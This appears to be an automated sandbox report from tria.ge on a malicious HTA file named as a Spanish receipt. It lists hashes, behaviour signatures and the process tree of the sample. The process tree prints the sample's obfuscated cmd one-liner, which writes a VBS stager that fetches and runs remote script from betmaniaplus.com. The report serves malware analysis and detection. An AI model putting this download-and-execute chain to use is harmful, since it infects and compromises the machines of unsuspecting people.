Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    138s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    18/09/2023, 16:02

General

  • Target

    Comprobante_1296926.hta

  • Size

    26KB

  • MD5

    15e5781d66044202528f9f4a5af2eef5

  • SHA1

    1bf79e56761c45850c8ea076590074eda11d3e38

  • SHA256

    d873e8acacb72ab8a79133141463b0ccb9a17d948da2865d9045c3e22bed7bf0

  • SHA512

    3cb0e5f8aa054a75e9ecef34648e83dae9377ef554388f0bbc4a07654e2387f5c94d830eb2c31fd0562b02aad4fb18e231fc2a0d6a12cb529c6d652c74cc9c53

  • SSDEEP

    768:CNnHIy4gnvcVbmDth1WPW95DKRfWh2qduHRd2:CNoyBwqP1W+9IRe/duHRd2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Comprobante_1296926.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo|set /p=^"s7p=".":szX="i":mni9="g":kqm=":":GetO^">C:\\Users\\Public\\tpk.vbs&echo|set /p=^"bject("sCr"+szX+"pt"+kqm+"hT"+"Tps"+kqm+"//betmaniaplus"+s7p+"com//"+mni9+"1")^">>C:\\Users\\Public\\tpk.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tpk.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="s7p=".":szX="i":mni9="g":kqm=":":GetO" 1>C:\\Users\\Public\\tpk.vbs"
        3⤵
          PID:5024
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo"
          3⤵
            PID:2876
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo"
            3⤵
              PID:4804
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+szX+"pt"+kqm+"hT"+"Tps"+kqm+"//betmaniaplus"+s7p+"com//"+mni9+"1")" 1>>C:\\Users\\Public\\tpk.vbs"
              3⤵
                PID:1348
              • \??\c:\windows\SysWOW64\cmd.exe
                c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tpk.vbs
                3⤵
                • Checks computer location settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:2928
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\tpk.vbs"
                  4⤵
                  • Blocklisted process makes network request
                  PID:3568

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\tpk.vbs

            Filesize

            115B

            MD5

            3ac1fe00346022002370d0c49f42a422

            SHA1

            bbde71875b8b2a7d437ebcdad956f0ec064046dd

            SHA256

            e5f62adcac4e1cf87e2432a0539ee0cf571c9451ec5cfe3b2ac099dbc14a63dd

            SHA512

            cd996093b652c309ea60f741a8b0c7ffaa7798e1ae28a5bef642e21052f5e840aa102e70978875469d148da264a9cb465cd506c2741b68842625001fb53ec160

          • C:\Users\Public\tpk.vbs

            Filesize

            115B

            MD5

            3ac1fe00346022002370d0c49f42a422

            SHA1

            bbde71875b8b2a7d437ebcdad956f0ec064046dd

            SHA256

            e5f62adcac4e1cf87e2432a0539ee0cf571c9451ec5cfe3b2ac099dbc14a63dd

            SHA512

            cd996093b652c309ea60f741a8b0c7ffaa7798e1ae28a5bef642e21052f5e840aa102e70978875469d148da264a9cb465cd506c2741b68842625001fb53ec160